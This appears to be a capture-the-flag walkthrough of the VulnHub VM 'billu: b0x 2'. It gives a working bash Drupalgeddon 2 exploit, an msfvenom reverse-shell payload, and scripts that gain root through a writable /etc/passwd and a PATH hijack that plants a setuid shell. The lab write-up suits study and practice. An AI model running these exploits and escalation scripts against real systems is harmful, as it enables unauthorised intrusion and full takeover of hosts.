This post documents the complete walkthrough of billu: b0x 2, a boot2root VM created by Manish Kishan Tanwar, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.


Background

Try this if you want an OSCP refresher that’s not too difficult.

Information Gathering

Let’s start with an nmap scan of all TCP ports to establish which services the host exposes.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129
...
PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 e6:3e:0d:ca:5c:3e:57:f8:1d:e6:e6:c5:3b:b3:67:b5 (DSA)
|   2048 ee:ef:3e:03:3a:24:f8:9f:35:4f:3a:9a:6f:64:a5:f5 (RSA)
|   256 af:60:d8:cb:90:08:63:4b:d3:7b:04:d3:7c:db:cf:bf (ECDSA)
|_  256 c0:56:96:d2:62:52:ea:9f:7f:d8:2a:7a:6b:1b:bd:56 (ED25519)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-methods:
|_  Supported Methods: GET POST HEAD OPTIONS
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips/ /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Home | --==[[ Billu b0x 2 - with love from indishell Lab ]]==--
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp   rpcbind
|   100000  2,3,4      111/udp   rpcbind
|   100024  1        42940/udp   status
|_  100024  1        45103/tcp   status
8080/tcp  open  http    syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
45103/tcp open  status  syn-ack ttl 64 1 (RPC #100024)

nmap finds a handful of open ports: SSH on 22, Apache on 80, rpcbind on 111 (with its status companion on 45103) and Tomcat on 8080. Nothing unusual. Let’s take a look at the web-related ones. The generator meta tag in the HTML source, which nmap’s http-generator script picked up, tells me I’m looking at a Drupal 8 installation.

Drupalgeddon

Suffice to say, the first thought that comes to mind is Drupalgeddon. Since this is Drupal 8, I’ll give EDB-ID 44448 a shot: a Python proof of concept for Drupalgeddon 2 (CVE-2018-7600) that tests for remote command execution by writing a file through the form API and then checking that the file exists. In any case, it’s easy to redo it in bash, i.e. wrap curl in a script and re-purpose it to take an argument: any shell command.

exploit.sh

#!/bin/bash
# Drupalgeddon 2 PoC re-purposed to run an arbitrary command ($1) on the target.
# The command is smuggled in as a #post_render callback (exec) on the mail element
# of the user registration form, reached through Drupal's AJAX endpoint.
RHOST=192.168.30.129
URL="http://$RHOST/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
CMD="$1"

STATUS=$(curl -s \
    -o /dev/null \
    -w '%{http_code}' \
    --data-urlencode "form_id=user_register_form" \
    --data-urlencode "_drupal_ajax=1" \
    --data-urlencode "mail[#post_render][]=exec" \
    --data-urlencode "mail[#type]=markup" \
    --data-urlencode "mail[#markup]=$CMD" \
    "$URL")

if [ "$STATUS" -eq 200 ]; then
    echo "[+] Exploit Successful"
else
    echo "[!] Exploit Failed"
fi

Time to run my exploit script.

On my exploit script terminal

On my nc listener

You can see the remote command executed successfully.

Next, I’ll make use of wget to transfer a reverse shell (generated by msfvenom ), make it executable with chmod , and then execute it.

You can generate the reverse shell with msfvenom like so.

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.30.128 LPORT=1234 -f elf -o rev
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: rev

On my exploit script terminal

On my SimpleHTTPServer terminal

On my nc listener

I got shell.

Privilege Escalation

Long story short: once you have a low-privilege shell, there are two ways to get root on this box.

Method 1: world-writable /etc/passwd

How do you know /etc/passwd is world-writable? Simple: ls -l /etc/passwd shows a w in the last permission triplet instead of the usual -rw-r--r--. A sweep such as find / -perm -o+w -type f 2>/dev/null turns up the same thing without having to guess which file to look at.

So what if /etc/passwd is world-writable? What can you do with it? Enough to be dangerous. A password hash placed in the second field of a passwd entry is used directly, so /etc/shadow never comes into play, and the uid field is what decides who you are. Append an entry for a new user toor with uid 0 and a hash of the password toor.

su to toor . Password is toor .
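The following is an added example, not code from the original post: it packages the passwd trick as functions that work on any passwd-format file, so it can be rehearsed on a scratch copy before being pointed at the real /etc/passwd on a target where that file is writable. It assumes openssl is available to produce the hash; the account name toor and password toor come from the post.

```shell
# Added example, not from the original post. Rehearses the /etc/passwd trick on
# any passwd-format file so it can be tried on a scratch copy first; point it at
# the real /etc/passwd only on a target where that file is writable.
# Assumptions: openssl is available for hashing; the new account is called
# toor with password toor, as in the post.

# True if the "other" write bit is set: ls -l prints it in column 9 (-rw-rw-rw-).
is_world_writable() {
    [ "$(ls -l "$1" | cut -c9)" = "w" ]
}

# Hash a password in the md5crypt form crypt(3) understands ($1$salt$hash).
# SHA-512 (-6) is stronger but only newer openssl builds offer it; md5crypt is
# accepted by any Linux PAM stack and is plenty for a box we already own.
hash_password() {
    openssl passwd -1 -salt "$2" "$1"
}

# passwd(5) line for a second uid-0 user. A hash in field 2 is used as-is, so
# /etc/shadow never comes into play; uid 0 is what makes the account root.
make_root_entry() {
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$1" "$2" "$1"
}

# Append the entry if the file is writable by us; fail loudly otherwise.
add_root_user() {
    local file=$1 user=$2 hash=$3
    [ -w "$file" ] || { echo "[-] $file is not writable" >&2; return 1; }
    make_root_entry "$user" "$hash" >> "$file"
    echo "[+] appended $user (uid 0) to $file"
}

# Usage on the target:  ./passwd_root.sh /etc/passwd
#                       su toor              (password: toor)
if [ $# -ge 1 ]; then
    if is_world_writable "$1"; then echo "[+] $1 is world-writable"; fi
    add_root_user "$1" toor "$(hash_password toor s4lt)"
fi
```

The file argument is deliberately required rather than defaulting to /etc/passwd, so a careless run on your own machine does not hand out a root account.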

Method 2: /opt/s is setuid to root

How do you know /opt/s is setuid to root? Simple: ls -l /opt/s shows root as the owner and an s where the owner’s execute bit would be (rwsr-xr-x). A hunt for setuid binaries, find / -perm -4000 -type f 2>/dev/null, would have turned it up as well.

Check out the strings in the executable. This is a classic: hijacking the default executable search path.

scp is called by bare name rather than by absolute path, so whichever scp appears first in PATH is the one the setuid process runs. Prepend a directory we control to PATH, drop an executable named scp into it, and run /opt/s. Heck, we don’t even have to compile any code. Any shell script that starts with #! will suffice, as long as it’s called scp. One caveat: bash resets the effective uid to the real uid when the two differ and it was not started with -p, so if /opt/s does not call setuid(0) before invoking scp, write the fake scp as #!/bin/sh (dash on Ubuntu) or #!/bin/bash -p, or it may run as the low-privilege user after all.
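The script below is an added example, not code from the original post. It rehearses the PATH hijack against a stand-in for /opt/s: a plain script that invokes scp by bare name, which is the flaw the strings output exposed. On the box the same fake scp, placed at the front of PATH, runs as root because /opt/s is setuid; in the rehearsal it runs as the current user, which is the only difference. All file names are scratch paths chosen for the example.

```shell
# Added example, not from the original post. Rehearses the PATH hijack against
# a stand-in for /opt/s so the mechanics can be checked without a setuid binary:
# the stand-in is a script that invokes scp by bare name, the flaw strings(1)
# exposed. On the box the same fake scp in front of PATH runs as root because
# /opt/s is setuid; here it runs as us. Paths are scratch files.

# Write a fake scp into DIR. Its first line records the uid it ran as; the rest
# is the usual payload, a setuid copy of sh. #!/bin/sh on purpose: dash keeps
# the effective uid it inherits, while bash resets euid to the real uid unless
# started with -p, so a #!/bin/bash fake scp can lose root if /opt/s does not
# call setuid(0) first.
plant_fake_scp() {
    local dir=$1 marker=$2
    cat > "$dir/scp" <<EOF
#!/bin/sh
id -u > "$marker"
cp /bin/sh "$dir/rootsh" && chmod 4755 "$dir/rootsh"
EOF
    chmod 755 "$dir/scp"
}

# Stand-in for /opt/s: same mistake, scp resolved through PATH.
make_victim() {
    printf '#!/bin/sh\nscp 2>/dev/null\n' > "$1"
    chmod 755 "$1"
}

# Run the victim with our directory first in PATH; print the uid the fake scp got.
hijack() {
    local dir=$1 victim=$2 marker=$3
    PATH="$dir:$PATH" "$victim"
    cat "$marker"
}

# Usage on the box (only the victim differs from the rehearsal):
#   mkdir -p /tmp/x; plant_fake_scp /tmp/x /tmp/x/marker
#   PATH=/tmp/x:$PATH /opt/s; cat /tmp/x/marker   # prints 0
#   /tmp/x/rootsh                                 # root shell (add -p if sh is bash)
if [ "$1" = rehearse ]; then
    d=$(mktemp -d)
    plant_fake_scp "$d" "$d/marker"; make_victim "$d/s"
    echo "fake scp ran as uid $(hijack "$d" "$d/s" "$d/marker")"
    rm -rf "$d"
fi
```

Run it with the single argument rehearse to see the hijack land locally; the marker file is the proof that the planted scp, not the real one, was executed.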

Afterthought

A good way to kill time.